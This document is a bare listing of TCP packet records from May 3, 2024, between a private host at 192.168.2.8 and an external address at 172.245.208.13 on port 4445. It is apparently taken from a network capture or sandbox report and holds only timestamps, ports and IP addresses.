May 3, 2024 13:13:44.176007986 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176018953 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176084042 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176124096 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176152945 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176188946 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176232100 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176266909 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176352978 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176393986 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176476955 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176578045 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176630974 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176668882 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176714897 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176760912 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.176822901 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.176969051 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.177057981 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.271771908 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271796942 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271811962 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271823883 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271843910 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271878958 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271883965 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.271922112 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.271950960 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.271965027 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272001982 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272016048 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272056103 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272056103 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272063017 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272105932 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272186995 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272193909 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272200108 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272213936 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272226095 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272238970 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272252083 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272253036 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272291899 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272291899 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272291899 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272336960 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272373915 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272387981 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272423983 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272464991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272478104 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272479057 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272527933 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272569895 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272583961 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272597075 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272627115 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272629976 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272665024 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272675991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272697926 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272715092 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272767067 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272774935 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272789001 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272803068 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272809029 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272836924 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272839069 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272851944 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272890091 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.272918940 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272962093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.272990942 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.273015976 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.273027897 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.273118973 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.368946075 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.368968964 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.368983984 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.368997097 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369019032 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369045019 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369056940 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369071007 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369107008 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369108915 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369182110 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369211912 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369218111 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369225025 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369251013 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369281054 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369301081 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369347095 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369349003 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369393110 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369416952 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369437933 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369471073 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369483948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369498014 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369530916 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369556904 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369569063 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369587898 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369595051 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369626999 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369654894 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369668961 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369680882 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369704008 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369712114 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369725943 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369729996 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369797945 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369801044 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369812965 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369846106 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369863987 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369877100 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369889021 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369919062 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369926929 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.369932890 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369947910 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.369961023 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370002985 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370029926 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370044947 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370058060 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370073080 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370079041 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370109081 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370121956 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370125055 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370166063 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370183945 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370228052 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370291948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370305061 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370312929 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370312929 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370352030 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370372057 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370373964 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370398998 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370423079 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370445967 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370466948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370491028 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370512962 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370512962 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370528936 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370572090 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370584011 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370584965 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370618105 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370686054 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370687008 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370721102 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370732069 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370738029 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370757103 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370779991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370801926 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370819092 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370819092 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370840073 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370853901 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370879889 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370907068 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370935917 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.370953083 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.370974064 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371037006 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371076107 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371089935 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371148109 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371176004 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371191025 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371232033 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371257067 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371329069 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371411085 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371424913 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371440887 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371467113 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371486902 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371493101 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371558905 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371582985 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371594906 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371608973 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371622086 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.371648073 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.371666908 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.469918013 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.469939947 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.469993114 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470002890 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470009089 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470022917 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470066071 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470077991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470117092 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470118046 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470170975 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470184088 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470216990 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470232964 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470246077 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470279932 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470293999 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470364094 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470369101 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470419884 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470432997 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470478058 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470499992 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470535040 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470568895 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470573902 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470582962 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470601082 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470623970 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470629930 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470630884 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470664978 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470678091 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470736027 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470738888 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470750093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470762014 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470778942 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470781088 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470810890 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470835924 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470849037 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470876932 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470886946 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470911026 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470925093 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.470953941 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470953941 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.470993996 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471014023 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471026897 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471055031 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471081972 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471127033 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471129894 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471170902 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471184015 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471199036 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471235037 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471235037 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471266985 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471281052 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471293926 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471304893 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471324921 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471347094 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471381903 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471396923 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471417904 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471441031 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471467018 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471492052 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471534967 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471566916 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471579075 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471590996 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471604109 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471628904 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471628904 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471657991 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471702099 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471719980 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471735001 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471780062 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471784115 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471798897 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471821070 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471833944 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471847057 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471877098 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471877098 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471882105 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471925974 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471935987 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.471940994 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471965075 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.471973896 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472013950 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472027063 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472052097 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472078085 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472112894 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472131968 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472140074 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472182035 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472184896 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472196102 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472242117 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472270966 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472285986 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472333908 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472347975 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472363949 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472383976 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472390890 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472431898 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472470045 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472474098 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472503901 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472538948 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472546101 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472575903 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472619057 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472623110 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472632885 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472681046 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472700119 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472754955 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472789049 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472794056 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472846985 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.472903013 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.472907066 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473032951 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473046064 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473058939 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473071098 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473072052 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473084927 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473098040 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.473105907 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.473113060 CEST	4445	49711	172.245.208.13	192.168.2.8
